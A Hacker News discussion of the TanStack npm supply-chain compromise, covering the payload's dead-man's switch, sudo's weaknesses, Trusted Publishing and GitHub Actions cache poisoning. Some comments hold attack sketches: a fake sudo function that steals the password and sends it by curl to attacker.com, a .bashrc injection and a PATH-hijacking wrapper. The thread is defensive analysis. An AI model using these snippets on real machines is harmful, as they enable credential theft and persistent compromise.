Posted by varunsharma07 13 hours ago

Postmortem: TanStack NPM supply-chain compromise (tanstack.com)
https://github.com/TanStack/router/issues/7383
875 points | 356 comments
cube00 12 hours ago|
Please be careful when revoking tokens. It looks like the payload installs a dead-man's switch at ~/.local/bin/gh-token-monitor.sh as a systemd user service (Linux) / LaunchAgent com.user.gh-token-monitor (macOS). It polls api.github.com/user with the stolen token every 60s, and if the token is revoked (HTTP 40x), it runs rm -rf ~.

https://github.com/TanStack/router/issues/7383#issuecomment-...
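
If you're affected, a rough sketch of disarming it before revoking (unit/label names taken from the report above; verify what's actually on your machine):

    # Linux: stop and remove the systemd user service first
    systemctl --user disable --now gh-token-monitor.service
    rm -f ~/.local/bin/gh-token-monitor.sh

    # macOS: unload the LaunchAgent first
    launchctl bootout gui/$(id -u)/com.user.gh-token-monitor
    rm -f ~/Library/LaunchAgents/com.user.gh-token-monitor.plist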

Gigachad 10 hours ago||
Realistically if you have installed malware, you need to do a full wipe of your computer anyway.
eqvinox 10 hours ago|||
[On Linux:]

If you didn't give yourself "free" (passwordless) sudo, that's not necessary…

…unless it happened in a week with 2 and a half Linux kernel LPEs.

lrvick 9 hours ago|||
Sudo is security theater.

Malware can make a fake unprivileged sudo that sniffs your password.

    function sudo () {
        realsudo="$(which sudo)"
        read -r -s -p "[sudo] password for $USER: " password
        # exfiltrate the captured password
        echo "$USER: $password" | \
            curl -F 'p=<-' https://attacker.com >/dev/null 2>&1
        # warm sudo's timestamp so the victim never sees a second prompt
        $realsudo -S -u root bash -c "exit" <<< "$password" >/dev/null 2>&1
        $realsudo "$@"
    }
xlii 2 hours ago|||
Stupid thought.

Make an alias called sdo that echoes the sudo path and hash to stderr every time you use it.

That's security by obscurity though.
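
Roughly, a sketch:

    sdo() {
        type -a sudo >&2                  # exposes any shadowing alias/function plus every PATH hit
        sha256sum "$(type -P sudo)" >&2   # hash of the binary PATH would resolve
        command sudo "$@"                 # bypasses shell functions and aliases
    }

(Though as others note, malware that can edit your rc files can just as easily redefine sdo.)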

sinsudo 4 hours ago||||
Use /usr/bin/sudo yourcommand, with any intermediate command referenced by its real hard-coded path rather than looked up via PATH.

Edit: I previously suggested using \sudo, but that still depends on the PATH variable, which the attacker can modify.

throwaway7356 2 hours ago|||
Yeah, works well:

    $ /usr/bin/sudo() { echo Not the real sudo.; }
    $ /usr/bin/sudo
    Not the real sudo.

And every other suggestion also doesn't work if the attacker can just replace the shell.

anthk 25 minutes ago|||
/usr/bin/sudo isn't evaluated as a function under ksh.
ChocolateGod 1 hour ago||||
Surely if malware has rw access to the home folder, it can adjust the env variables / shell to make this also fake.
mort96 4 hours ago||||
Yes, that would be one potential solution. But I have certainly never done it and bet >99.999% of the world's use of sudo is through 'sudo'.

Plus you only need one slip-up and you're hosed. Even people who try to almost always use '/usr/bin/sudo' will undoubtedly accidentally let a 'sudo' go through. Maybe they copy/paste a command from somewhere (after verifying that it's safe of course) and just didn't think of the sudo issue then and there.

sinsudo 3 hours ago||
The real problem is that there should be at least two levels for sudo: one for installing software, and another that can actually compromise the entire system. The two layers should be separate to mitigate risk. At a minimum, the more secure layer should allow you to perform recovery and diagnosis.
DaSHacka 45 minutes ago|||
More than just two levels for sudo, the Linux permission model is completely broken for this very reason. (Also see: https://xkcd.com/1200/)

Honestly, the Android approach is significantly better. (and for that, see Micay's various ramblings posted online)

lrvick 2 hours ago||||
You do not need sudo to install software. You can just install to ~/.local.

Many package managers require sudo, sure, but there is no good reason for them to in a modern Linux system, and not all require this.

Even with systemd, you can use systemd --user.

michaelmior 2 hours ago||
That depends on what the software is. If you want to run a service that binds to a privileged port, for example, you need sudo.
lrvick 56 minutes ago|||
If you set the appropriate Linux capabilities flag on a binary such as sshd at boot, then unprivileged users can bind to 22, no problem.

setcap 'cap_net_bind_service=+ep' /usr/sbin/sshd

Could even run it as a daemon unprivileged from a home directory with "systemd --user"

That said if you have multiple users and want every user to have their own sshd reachable on port 22 on the same machine you probably want to listen on vhost namespaced unix sockets and have something like haproxy listen on port 22 instead. Haproxy could of course also run unprivileged provided it has read access to all the sockets.
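
For the "systemd --user" route, a rough sketch (flags and paths illustrative, not a hardened config):

    # run sshd as a transient user-level service, no root involved
    systemd-run --user --unit=user-sshd \
        /usr/sbin/sshd -D -f "$HOME/.ssh/sshd_config" -h "$HOME/.ssh/ssh_host_key"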

zrm 54 minutes ago||||
For that you really only need CAP_NET_BIND_SERVICE.

The bigger issue is that if you want to install or update system-wide packages, many of those will be used by privileged processes. Suppose you want to update /bin/sh. Even if the only permission you had is to write binaries, that'll get you root.

signed-log 58 minutes ago|||
For most things, you can get by with capabilities.

The issue is that it increases friction, and you need sudo anyway to set the capabilities.

Most web servers would be happy to run unprivileged with only CAP_NET_BIND_SERVICE.

DonHopkins 2 hours ago|||
Unix used to have a user named "bin" just for owning all the binaries and performing installs.
sinsudo 2 hours ago||
The old bin user is an idea that could be modernized with a new two-level sudo concept, with the higher level reserved for recovery and diagnosis, as is already done on Chromebooks and other systems.
DonHopkins 42 minutes ago||
bin passwords I will always remember: At the University of Maryland CS department systems the bin password was "fuck,you", and there was a devout Christian student on staff who had a problem with that, so we had to change it (to something harder to remember, I just can't recall).
exyi 3 hours ago||||
Ok, so the malware runs a keylogger / clipboard logger, gets the password, and runs sudo on its own. Or it replaces your shell by putting exec ~/hackedbash into your bashrc.

A password on sudo is only useful if you detect the infection before you run sudo.

fragmede 3 hours ago||
You could link it to a YubiKey via pam.d so you need a physical touch to authenticate.
pastage 2 hours ago|||
Physical attestation is a hard problem; I think it would be nice if all TPMs in laptops had this. Then the problem becomes how to automate the stuff that needs to be done.
lrvick 2 hours ago|||
And then the moment you authenticate, the fake sudo still executes its payload.

Yubikeys do not fix this issue.

eviks 3 hours ago|||
Why not make a proper link, /sudo, so you don't have to type out the full path every time, which is very inconvenient? (But the fact that such workarounds are needed still means it's theater.)
lrvick 2 hours ago|||
A simple LD_PRELOAD command can cause your shell to run "rm -rf /" when you type "/sudo".

If your unprivileged user is compromised, you are pretty hosed.

anthk 19 minutes ago||
There should be a way to make system env vars (profile.d or similar) read-only, so every user's shell has them set to empty values and can't change them.
sinsudo 2 hours ago|||
Anything that can be modified by an attacker cannot be used to secure the sudo command. This is a recursive requirement for secure systems.
eviks 1 hour ago||
You can set the permissions so that the attacker can't modify it?
nazcan 9 hours ago||||
To clarify, when does this run? Like, you download malware A, run malware A, and this function definition replaces sudo just for that session, or for other cases too?
lrvick 9 hours ago||
This could for instance be injected into your .bashrc when you do an "npm install" of a package that has a deeply nested supply chain attack.

Then the next time you run sudo, phase2 triggers installing a rootkit, etc.
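
A sketch of that delivery (paths hypothetical):

    # what a malicious postinstall script might do
    mkdir -p ~/.cache/.x
    cp fake-sudo.sh ~/.cache/.x/
    echo 'source ~/.cache/.x/fake-sudo.sh' >> ~/.bashrc   # the wrapper now loads in every new shell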

arcfour 9 hours ago|||
Or you could also hijack it using $PATH search order with your wrapper to get existing terminal sessions too, there's a lot of ways to skin that cat.
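
E.g. a sketch, assuming ~/.local/bin precedes /usr/bin in PATH (it often does):

    cat > ~/.local/bin/sudo <<'EOF'
    #!/bin/sh
    # ...capture the password here, then hand off...
    exec /usr/bin/sudo "$@"
    EOF
    chmod +x ~/.local/bin/sudo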
lrvick 8 hours ago||
Endless ways, which is why I do not understand why sudo is ever used anymore, especially in production.

Between namespaces and capabilities, you do not need root to do anything in Linux these days anyway, so there is really no reason for root to be accessible at all, or for any processes to run as root post-boot.

GCUMstlyHarmls 7 hours ago||
I don't mean to be snarky, but can you run `pacman -Syu` without root with "new" tech? Or do you mean in general on production systems or whatever?
lrvick 2 hours ago||
Plenty of package managers can install to an arbitrary directory like ~/.local. Each user, or even each project, can have its own rootfs full of software.

The only things I tend to have running at the system level are a kernel and init and maybe openssh.

Ferret7446 8 hours ago|||
That is one of many reasons to keep your dotfiles under version control.
lrvick 8 hours ago|||
Someone that can wrap your sudo binary can wrap your git binary too. Once your OS is compromised, all bets are off.
lpribis 8 hours ago|||
How would that help? Unless you happen to check the dotfiles git diff before running _anything_. I guess this could be put in prompt or some cron job to detect diffs but I bet absolutely nobody does this.
TacticalCoder 8 hours ago||||
> Sudo is security theater.

Yes indeed.

> Malware can make a fake unprivileged sudo that sniffs your password.

Not on my Linux workstation though. No sudo command installed. Not a single setuid binary, not even su. So basically only root can use su and nobody else.

The only way to log in as root is either by going to tty2 (but the root password is 30 characters long, on purpose, to be sure I never enter it, so login from tty2 isn't really an option) or by logging in from another computer, using a Yubikey (no password login allowed). That other computer is on a dedicated LAN (a physical LAN, not a VLAN) that exists only for the purpose of allowing root to SSH in (yes, I do allow root to SSH in: but only with U2F/Yubikey... I have to, as it's the only real way to log in as root).

It is what it is and this being HN people are going to bitch that it's bad, insecure, inconvenient (people typically love convenience at the expense of security), etc. but I've been using basically that setup since years. When I need to really be root (which is really not often), I use a tiny laptop on my desk that serves as a poor admin's console (but over SSH and only with a Yubikey, so it'd be quite a feat to attack that).

Funnily enough last time I logged in as root (from the laptop) was to implement the workaround to blacklist all the modules for copy.fail/dirtyfrag.

That laptop doesn't even have any Wifi driver installed. No graphical interface. It's minimal. It's got a SSH client, a firewall (and so does the workstation) and that's basically it. As it's on a separate physical LAN, no other machine can see it on the network.

I did set that up just because I could. Turns out it's fully usable so I kept using it.

Now of course I've got servers, VMs, containers, etc. at home too (and on dedicated servers): that's another topic. But on my main workstation a sudo replacement function won't trick me.

bee_rider 7 hours ago|||
This thread was kicked off by somebody who said:

> Realistically if you have installed malware, you need to do a full wipe of your computer anyway

You might be the exception to this sentiment. But out of curiosity, after all that setup, would you feel confident trying to recover from malware (rather than taking the “nuke it from orbit” approach)?

lrvick 8 hours ago||||
In my case I use QubesOS so sudo is useless even if present since every security domain is isolated by hypervisor.

For servers, sudo or a package manager etc should not exist. There is no good reason for servers to run any processes as root or have any way to reach root. Servers should generally be immutable appliances.

nozzlegear 7 hours ago||||
FYI, in English the phrase "since years" is grammatically incorrect and sounds unnatural to a native speaker's ears. The correct phrase would be "I've been using that setup for years."

/aside

sufficientsoup 5 hours ago|||
Yeah, a "seit Jahren" (German for "since years") flashed through my mind as I read it.
kaonwarb 5 hours ago|||
I've heard this often enough from English speakers from India that I think it is accepted grammar in that region.
lemoncucumber 4 hours ago||
To my ears, “since years” sounds like it's missing an “ago” after it (or, like the GP said, “for years” sounds even more natural).

It makes me think of another similar one: I've noticed that British English speakers will say e.g. "the new iPhone will be available from September 20th"

To my ears that sounds like it's missing an “onwards” after it (or “starting September 20th” would sound even more natural).

regularfry 2 hours ago||
Is the meaning different? I'm struggling to see how "from September 20th" would have a different implication to "starting from September 20th" (or similar) given the context.
GoblinSlayer 1 hour ago||||
Why disallow password login when you have 30 char password?
jcgrillo 8 hours ago||||
Thanks for sharing this, that seems like a very cool setup. I have a very old good-for-almost-nothing laptop that would be perfect for this, might just have to copy you!
aiscoming 6 hours ago||||
Tell us about your disk encryption setup. And do you use Secure Boot?
WesolyKubeczek 4 hours ago|||
When you update your packages, are you using that ssh laptop?
FooBarWidget 2 hours ago||||
It would be great if:

1. Shells supported the notion of privileged commands that can't be overridden with PATH manipulations, aliases, or functions.

2. sudo (or PAM, actually) could authenticate with your identity provider (like Entra ID) instead of a local password. Then there is nothing to sniff, and you can also use 2FA or passkeys.

lrvick 50 minutes ago|||
Neither would actually help in this case though. Malware could manipulate both of those as an unprivileged user to run malicious code the next time you elevate privileges.

Remember that malware can replace or modify your shell

ctippett 2 hours ago|||
Fish shell has a `builtin` command [1], although sudo is not one of the commands it covers.

[1] https://fishshell.com/docs/current/cmds/builtin.html

DonHopkins 2 hours ago||||
Just sudon't.
j16sdiz 6 hours ago||||
sudo doesn't accept a password from stdin; it takes a tty.
dymk 6 hours ago||
https://superuser.com/questions/67765/sudo-with-password-in-...
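
e.g. the -S flag:

    # -S reads the password from stdin instead of the tty; -k forces re-authentication
    echo "$password" | sudo -S -k whoami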
nullsanity 9 hours ago|||
[dead]
Gigachad 10 hours ago||||
On linux realistically whatever user you installed the malicious NPM package with has access to everything you care about anyway.
silon42 1 hour ago|||
I had an idea to always run 2 users, the "main" one (or more) and a "project" one... one could sudo to the project user, but that user could not sudo back out... (npm would only be installed for the project user).
lrvick 9 hours ago|||
Every user, since privesc is so easy on most operating systems.
Gigachad 9 hours ago||
Sure, without exploits they can steal your api keys, read your personal data, and access your browser data. With exploits they can update packages on your computer too.
lrvick 8 hours ago||
No exploits needed. A simple shell alias will suffice. See my example in sibling comment.
lights0123 10 hours ago||||
Until it overrides sudo in your $PATH to install malware after you enter your password later.
ChocolateGod 1 hour ago||
Any application running as a user with sudo access and RW permissions on the user's home folder effectively has root permissions; it'll just take a little longer to get them.

That's why Flatpak's sandbox effectively doesn't exist if the application has access to the home folder.

WatchDog 8 hours ago||||
There are a million ways that malware can persist without root.
dgellow 10 hours ago||||
You should assume other LPEs exist though
walletdrainer 3 hours ago||||
What leads people to believe things like this?
stogot 9 hours ago|||
There have been numerous ways to root Linux over the decades.
sigzero 10 hours ago||||
It's the "nuke it from orbit" approach, but it's "the only way to be sure".
nsonha 6 hours ago|||
you're gonna need the infected device as is for forensics
meander_water 12 hours ago|||
I don't understand why people were voting this comment down on the issue page.
skissane 11 hours ago|||
Maybe they have a non-standard interpretation of thumbs-down – as "thumbs-down to this fact" not "thumbs-down to you for pointing it out"
thayne 6 hours ago|||
When you only have eight emoji reactions to choose from, people are bound to get creative in how they use them.
hmokiguess 9 hours ago||||
I have noticed this behaviour happening more often too, it's very confusing. Usually when texting with younger Gen Z people.
efilife 8 hours ago||
This has always been happening
Griffinsauce 6 hours ago||
We lived through a generation of ageism aimed at millennials, and now we're turning around and doing it to Gen Z. It's unbelievable.
matsemann 2 hours ago|||
Or they're from Eridian.
edoceo 7 hours ago||||
We need a new emoji for: the situation is lame and the poster is correct. Like a combination of thumbs-up+frown
__david__ 5 hours ago||
is not bad for that. Not precise, but in the ballpark.
bpavuk 12 hours ago||||
bots.

the GitHub bot law: the GitHub bot situation is way worse than you imagine even if you are aware of the GitHub bot law.

yes, a cheap parody of Hofstadter's Law, but that's how bad it is

sieabahlpark 11 hours ago||||
[dead]
noodletheworld 11 hours ago|||
There is no such thing as "please be careful when revoking tokens". What does that mean? Don't revoke them? Look at them carefully before revoking them?

And what? Just let the actor just keep using them to spread to other people?

Always rotate your tokens immediately if they're compromised.

If it hurts, well, that sucks. …but seriously, not revoking the tokens just makes this worse for everyone.

A fair comment would have been: “it looks like the payload installs a dead-man's switch…”

Asking the maintainers not to revoke their compromised credentials deserves every down vote it receives.

wavemode 11 hours ago|||
You seem to be interpreting "please be careful when..." as "don't". I'm not sure how that interpretation makes any sense. Obviously they just mean: first kill the service (or better yet, shut down the machine entirely) and then revoke the token...?
CodesInChaos 48 minutes ago||||
Here being careful about revocation means:

Make sure to have an up-to-date backup, that's offline, or at least not mounted on the affected computer.

Check for the dead-man switch, and if present, disarm it.

Only then revoke the tokens, instead of immediately revoking them like one would normally do. Nobody is suggesting keeping the compromised tokens active longer than necessary.

yuzuquat 11 hours ago||||
my understanding is that careful means cleaning up the dead-man’s switch before revoking
mosen 4 hours ago|||
Did you miss the part about the script that nukes your home folder?
corvad 7 hours ago|||
I'm not quite sure what this really accomplishes. Is it just M.A.D.? At that point the creds have been stolen and the whole machine is toast anyway.
avaq 5 hours ago|||
The point is to dissuade mass token revocations.

Let's say the attack becomes hugely successful and the worm spreads to thousands of devices. GitHub/npm could just revoke all compromised tokens (assuming they have a way to query them), stopping the worm in its tracks. But because of the dead man's switch, they'd know that in doing so, they'd be bricking thousands of their users' devices. So it effectively moves the responsibility to revoke compromised tokens from a central authority that could do it en masse to each individual who got compromised, greatly improving the worm's chances of survival.

dominicm 6 hours ago|||
Even after the owner has realized the attack and revoked the token, there are next steps (alerting the community, pulling from npm) that the havoc delays, even if just by a bit.
shevy-java 41 minutes ago|||
> as a systemd user service

Hah! I know why I don't use systemd.

bpavuk 12 hours ago|||
if so, then this is actual terrorism of the software world!!
embedding-shape 12 hours ago||
Only if the goal is to actually spread fear in a civilian population. It's not clear what the motivation is here besides "the worm spreads itself lol".
bpavuk 12 hours ago||
that dead man's switch surely smells like that tbh
isityettime 11 hours ago||
The dead man's switch reminds me of worms and viruses from my childhood, whose primary purpose was apparently just to wreak havoc rather than direct financial gain. It's a childish gimmick.
resonious 11 hours ago||
If an infected computer gets disabled after deactivating one stolen credential, it might slow down the victim from deactivating their other stolen credentials.
isityettime 11 hours ago||
Ugh. True.
dcchambers 11 hours ago|||
Incredible. Mutually assured destruction.

The next five years are going to be truly WILD in the software world.

Air-gapped systems are gonna be huge.

NSUserDefaults 10 hours ago||
Maybe just ai-gapped.
eqvinox 10 hours ago||
Is that an offhanded joke on the terminology or do you actually mean something? I can't tell.
fragmede 12 hours ago||
One should always have backups configured already, but if this is what gets people to set up backups, so much the better.
eqvinox 10 hours ago||
Sure. But even restoring from backup means a cost is being inflicted, and not a small one.
Ciantic 1 hour ago||
What I want to focus on is the mental model of your CI pipeline, and the problem with too much YAML. Consider this quote:

> Cache scope is per-repo, shared across pull_request_target runs (which use the base repo's cache scope) and pushes to main. A PR running in the base repo's cache scope can poison entries that production workflows on main will later restore.

This is very difficult to understand, and to teach to new people, because everything is configured as YAML, yet everything is laid out behind the scenes as directories and files.

What if your CI pipeline were an old-school bash script instead? It would be far more obvious to a greater number of people how it works, and what is left behind by other runs. We know how directories and files work in bash scripts.

Could we go back to basics and manage pipelines as scripts, and maybe even run a small server?
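
Something like this sketch (env var names borrowed from GitHub Actions for illustration):

    #!/usr/bin/env bash
    set -euo pipefail
    # the cache "scope" is just a directory you can ls, not a hidden key-matching rule
    cache="$HOME/.ci-cache/${GITHUB_REPOSITORY:?}/${GITHUB_REF_NAME:?}"
    mkdir -p "$cache"
    pnpm config set store-dir "$cache/pnpm-store"
    pnpm install --frozen-lockfile
    pnpm test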

SamuelAdams 10 minutes ago||
The other advantage with bash is that most developers can run it locally to validate what it is doing and debug issues. With GitHub Actions you always need to commit and push, slowing down the DX.
ryanschaefer 40 minutes ago|||
https://noyaml.com
LelouBil 39 minutes ago||
Not sure cases like the cache poisoning here would be more obvious.

Unless your bash script setup doesn't have the functionality of pull_request_target, but then removing it also works.

jonchurch_ 12 hours ago||
It is unfortunate, but this is evidence (IMO) that Trusted Publishing is still ~~not secure~~ not enough by itself to securely publish from CI, as an attacker inside your CI pipeline or with stolen repo admin creds can easily publish. This isn't new information, TP is not meant to guarantee against this, but migrating to TP away from local publish w/ 2fa introduces this class of attack via compromise of CI. (edit: changed "still not secure" to "still not enough by itself" bc that is the point I want to make)

Going to Trusted Publishing / pipeline publishing removes the second factor that typically gates npm publish when working locally.

The story here, while it is evolving, seems to be that the attacker compromised the CI/CD pipeline, and because there is no second factor on the npm publish, they were able to steal the OIDC token and complete a publish.

Interesting, but unrelated I suppose, is that the publish job failed. So the payload that was in the malicious commit must have had a script that was able to publish itself w/ the OIDC token from the workflow.

What I want is CI publishing to still have a second factor outside of Github, while still relying on the long lived token-less Trusted Publisher model. AKA, what I want is staged publishing, so someone must go and use 2fa to promote an artifact to published on the npm side.

Otherwise, if a publish can happen only within the Github trust model, anyone who pwns either a repo admin token or gets malicious code into your pipeline can trivially complete a publish. With a true second factor outside the Github context, they can still do a lot of damage to your repo or plant malicious code, but at least they would not be able to publish without getting your second factor for the registry.

captn3m0 12 hours ago||
The Astral blog recently pointed out how they do release gates (manual approvals on release workflows) even with trusted publishing. And sadly, none of the documentation for trusted publishing (npm/PyPI/RubyGems) even mentions this possibility, let alone defaults to it.
jonchurch_ 12 hours ago||
I have not read that blog post. But unfortunately (and I'd love to be wrong!) it doesn't matter if a repo admin's token gets exfiled, because if you put your gates within GitHub, a repo admin token is sufficient to defang all of them from the API without a 2fa challenge.

That is why I want 2fa before publish at the registry, because with my gh cli token as a repo admin, an attacker can disable all the GitHub branch protection, rewrite my workflows, disable the required reviewers on environments (which is one method people use for 2fa for releases: have workflows run in a GH environment which requires approval and prevents self-review), enable self-review, etc etc.

It's what I call a "fox in the hen house" problem: your security gates live within the same trust model you expect to get compromised (in this case, having a repo admin token exfiled from my local machine).

captn3m0 12 hours ago||
https://docs.github.com/en/actions/how-tos/deploy/configure-... is the feature they use.

> We impose tag protection rules that prevent release tags from being created until a release deployment succeeds, with the release deployment itself being gated on a manual approval by at least one other team member. We also prevent the updating or deletion of tags, making them effectively immutable once created. On top of that we layer a branch restriction: release deployments may only be created against main, preventing an attacker from using an unrelated first-party branch to attempt to bypass our controls.

> https://astral.sh/blog/open-source-security-at-astral

From what I understand, you need a website login, and not a stolen API token to approve a deployment.

But I agree in principle - The registry should be able to enforce web-2fa. But the defaults can be safer as well.

jonchurch_ 12 hours ago||
I tested approving a deployment via API last week w/ my gh cli token (well, had Claude do it while I watched). Again, I really want to be wrong about this, but my testing showed that it is indeed trivial to use the default token from my gh cli to approve via API. (repo admin scope, which I have bc I am admin on said repo)

Nothing in this link [1] proves what I said, but it is the test repo I was just conducting this on, and it was an approval-gated GHA job that I had Claude approve using my gh cli token.

I also had Claude use the same token to first reconfigure the environment to enable self-approves (I had configured it off manually before testing). It also put it back to self-approve disabled when it was done hehe

[1] https://github.com/jonchurch/deploy-env-test/actions/runs/25...
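
For the curious, the call is roughly this (run/environment IDs hypothetical):

    # approve a gated deployment with a plain repo-scoped token; no 2fa challenge anywhere
    gh api -X POST \
        repos/jonchurch/deploy-env-test/actions/runs/RUN_ID/pending_deployments \
        -F 'environment_ids[]=ENV_ID' -f state=approved -f comment='approved via API'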

captn3m0 12 hours ago||
You're right. Found the relevant docs+API calls:

https://docs.github.com/en/rest/actions/workflow-runs?apiVer...

Also for a Pending Deployment: https://docs.github.com/en/rest/actions/workflow-runs#review...

Both of these need `repo` scope, which you can avoid giving on org-level repos. For fine-grained tokens: "Deployments" repository permissions (write) is needed, which I wouldn't usually give to a token.

deathanatos 6 hours ago||
sigh Github's idiotic fractal of authentication types.

What upthread is talking about is the GitHub CLI app, `gh`; it doesn't use fine-grained tokens, it uses OAuth app tokens. I.e., if you look at fine-grained tokens (Settings → Developer settings → Personal access tokens → Fine-grained tokens), you will not see anything corresponding to `gh` there, as it does not use that form of authentication. It is under Settings → Applications → Authorized OAuth Apps as "Github CLI".

I just ran through the login sequence to double-check, but the permissions you grant it are not configurable during the login sequence, and it requests an all-encompassing token, as the upthread suggests.

Another way to come at this is to look at the token itself: gh's token is prefixed with `gho_` (the prefix for such OAuth apps), and fine-grained tokens are prefixed with `github_pat_` (sic)¹

¹(PATs are prefixed with `ghp_`, though I guess fine-grained tokens are also sometimes called fine-grain PATs… so, maybe the prefix is sensible.)

captn3m0 4 hours ago||
I’m paranoid, but I never authenticate the GitHub CLI - there should be no tokens lying around on my system. If needed, I have some scoped PATs in pass, which I can source as env variables. Git pushes happen over SSH with a Yubikey.
donmcronald 12 hours ago|||
I'd like to have touch to sign from a YubiKey or similar. The whole idea of trusting the cloud to manage credentials on your behalf seems like a mistake.
cluckindan 11 hours ago||
”TanStack maintainer Tanner Linsley said the attacker used an orphaned commit to gain access to the workflow run that stores the OIDC token, effectively bypassing the project’s existing publishing protections. He noted that two-factor authentication is enabled for everyone on the team”
bakkoting 10 hours ago|||
2fa being enabled for people on the team is different from 2fa being required for publishing. It is not currently possible to enforce (or use) 2fa for publishing with trusted publishing.
dboreham 10 hours ago||||
Apologies if this is a dumb question but how does this attack work? (I know what an orphaned commit is but not how you use one to bypass project access control).
fny 4 hours ago||
TLDR is that the attacker leveraged actions/cache to cache a poisoned pnpm store, which contains something that triggers during the package.json lifecycle. All it required was for someone to merge any PR: running what's in the cache triggers the second stage of the exploit, which mints an OIDC token, builds evil tarballs, and publishes.
duskdozer 8 hours ago|||
GitHub holding on to orphaned commits has been a noted issue for a while now.
koolba 7 hours ago||
It’s a wonderful feature when you accidentally nuke your one and only local copy.
lexicality 2 hours ago||
Depending on how badly you nuked it, it's probably still in your `git reflog` locally. Normal git hangs on to orphaned commits too. (Until `git gc` runs)
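
e.g.:

    git reflog                # find the sha of the "lost" commit
    git branch rescue <sha>   # re-attach it so git gc won't collect it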
streptomycin 10 hours ago|||
Yeah I have one semi-popular package and I am still doing local publish with 2fa because all this "trusted publishing" stuff seems really complicated and also seems to get hacked constantly. Maybe it's just too complicated for us to do securely and we should go back to the drawing board.
staticassertion 11 hours ago|||
I still think that Trusted Publishing is a significant win but I do like the idea of requiring a second factor to mark a release as truly published. It would make these CI worms very hard to pull off.
btown 10 hours ago||
The way I see it - if you're pushing a change to an NPM package with more than [N] daily downloads/downstream packages, and you don't have a human online who's able to approve a two-factor for the release on their phone... then you also don't have a human online who's able to hotfix or rollback in case of a breaking bug, much less a compromise. Even setting security aside - that's in service of a stable ecosystem.

And the two-factor approver should see a human-written changelog message alongside an AI summary of what was changed, that goes deeply into any updated dependencies. No sneaking through with "emergency bugfix" that also bumps a dependency that was itself social-engineered. Stop the splash radius, and disincentivize all these attacks.

Edit: to the MSFT folks who think of the stock ticker name first and foremost - you'd be able to say that your AI migration tools emit "package suggestions that embed enterprise-grade ecosystem security" when they suggest NPM packages. You've got customers out there who still have security concerns in moving away from their ancient Java codebases. Give them a reason to trust your ecosystem, or they'll see news articles like this one and have the opposite conclusion.

herpdyderp 12 hours ago|||
I was always confused at why people claimed trusted publishing would make any difference to this kind of supply chain attack.
staticassertion 11 hours ago||
Because it does. The attack has to involve the CI pipeline rather than the dev environment, there's no token to revoke after (if you evict the attacker you're done, the OIDC credentials expire), it's easier to monitor for externally, you can build things like branch protections in and isolate things like "run tests" from "publish", etc. Trusted Publishing is not itself a solution to all supply chain issues but it is a massive improvement.
jonchurch_ 11 hours ago||
I agree with you that TP is an improvement over long lived npm tokens in CI.

However, the threat I'm most afraid of still does involve dev environment compromise. Because if your repo admin gets their token stolen from their gh cli, they can trivially undo via API (without a 2fa gate!) any GitHub-level gate you have put in place to make TP safe. I want so badly to be wrong about that; we have been evaluating TP in my projects and I want to use it. But without a second factor to promote a release, at the end of the day if you have TP configured and your repo admin gets pwned, you cannot stop a TP release unless you race their publish and disable TP at npm.

TP is amazing at removing long lived npm tokens from CI, but the class of compromise that historically has plagued the ecosystem does not at all depend on the token being long lived, it depends on an attacker getting a token which doesnt require 2fa.

I am begging for someone to prove me wrong about this, not to be a shit, but because I really want to find a secure way to use TP in lodash, express, body-parser, cors, etc

staticassertion 10 hours ago||
Yes, that is the threat I'm most worried about as well. But look at your description of it - a repo admin has to be compromised. Not just "random engineer". Although, in this case, the attacker leveraged a cache poisoning attack to move into the privileged workflow and I suspect this sort of thing will be commonplace.

I'm in agreement that a second factor would be ideal, to be clear. I think it's a good idea, something like "package is released with Trusted Publishing, then 'marked' via a 2FA attestation". But in theory that 2FA is supposed to be necessary anyways since you can require a 2FA on Github and then require approvals on PRs - hence the cache poisoning being required.

jonchurch_ 10 hours ago||
Not to beat the dead horse, but this floored me when I realized it, so I keep trying to shout it at the top of my lungs.

There is no gate you can put on a Trusted Publisher setup in GitHub which requires 2fa to remove. Full stop. 2fa on GitHub gates some actions, but with a token with the right scope you can just disable the gating of workflow-runs-on-approve, branch protection, anything besides, I think, repo deletion and renaming.

And in my experience most maintainers will have repo admin perms, by nature of the maintainer team being small and high trust. Your point is well taken, however, that said stolen token does need to have high enough privileges. But if you are the lead maintainer of your project, your gh token just comes with admin scope on your repo.

wereHamster 12 hours ago|||
I'm looking forward to the analysis how the attacker managed to compromise CI. I was reading through the workflow and what immediately jumped out was a cache poisoning attack. Seems plausible, given https://github.com/TanStack/config/pull/381

edit: two hard things in computer science: naming things, cache invalidation, off-by-one errors, security. something something

dgellow 10 hours ago|||
Yes it is a GitHub actions cache poisoning attack
silverwind 11 hours ago|||
Almost all these recent compromises seem to involve either cache poisoning or prompt injection via untrusted variables.
mnahkies 3 hours ago|||
I use GitHub environments to require a manual approval (which includes MFA) in GitHub, prior to a pipeline running with a oidc token capable of publishing.

Would this have caught the cache poisoning? Unsure, though it at least means I'm intentionally authorising and monitoring each publish for anything unexpected.

https://docs.github.com/en/actions/deployment/targeting-diff...

killerstorm 1 hour ago|||
Yeah, it's kinda weird - it's not like GitHub uses a particularly secure stack, formal verification or anything. It's just a regular build server with the power to compromise millions of software packages.

Bitcoin people solved this problem a decade ago with deterministic builds: Bitcoin Core is considered published when 5+ devs get a bit-exact build artifact, each individually signing its hash. Replicating that model isn't hard; it's just that nobody cares. People just want to trust the cloud because it's big.

decodebytes 6 hours ago||
[dead]
varunsharma07 11 hours ago||
@mistralai/mistralai npm package was also compromised as part of this worm https://github.com/mistralai/client-ts/issues/217

It has been pulled from the npm registry now.

chrisweekly 12 hours ago||
Postinstall scripts are deadly. Everyone should be using pnpm.

Crazy that an "orphan" commit pushed to a FORK(!) could trigger this (in npm clients). IMO GitHub deserves much of the blame here. A malicious fork's commits are reachable via GitHub's shared object storage at a URI indistinguishable from the legit repo. That is absolutely bonkers.

jonchurch_ 10 hours ago||
The compromised action here was using pnpm.

They poisoned the github action cache, which was caching the pnpm store. The chain required pull_request_target on the job to check bundle size, which had cache access and poisoned the main repo’s cache

The malicious package that was published will compromise local machines it's installed on via the prepare script, though.

ricardobeat 2 hours ago|||
Those are two different attack vectors. The exploit they used on Github Actions would work for either npm or pnpm. But the replication part using postinstall scripts, once it is installed on another machine, would be stopped by pnpm.

What I'm curious about is: how can you poison the cache in CI, if the lockfile has an integrity hash for each package?

Did the incoming PR modify pnpm-lock.yaml? If so, that would be an obvious thing to disallow in any open-source project and require maintainer oversight.

maxloh 4 hours ago||||
I think it was an afterthought in the design. CI cache should be scoped per-user, or at least per-group.

If a workflow run by a maintainer (with access to secrets) can pull a cache tarball uploaded by a random user on GitHub, then it’s a security black hole. More incidents like this are inevitable.

corvad 7 hours ago|||
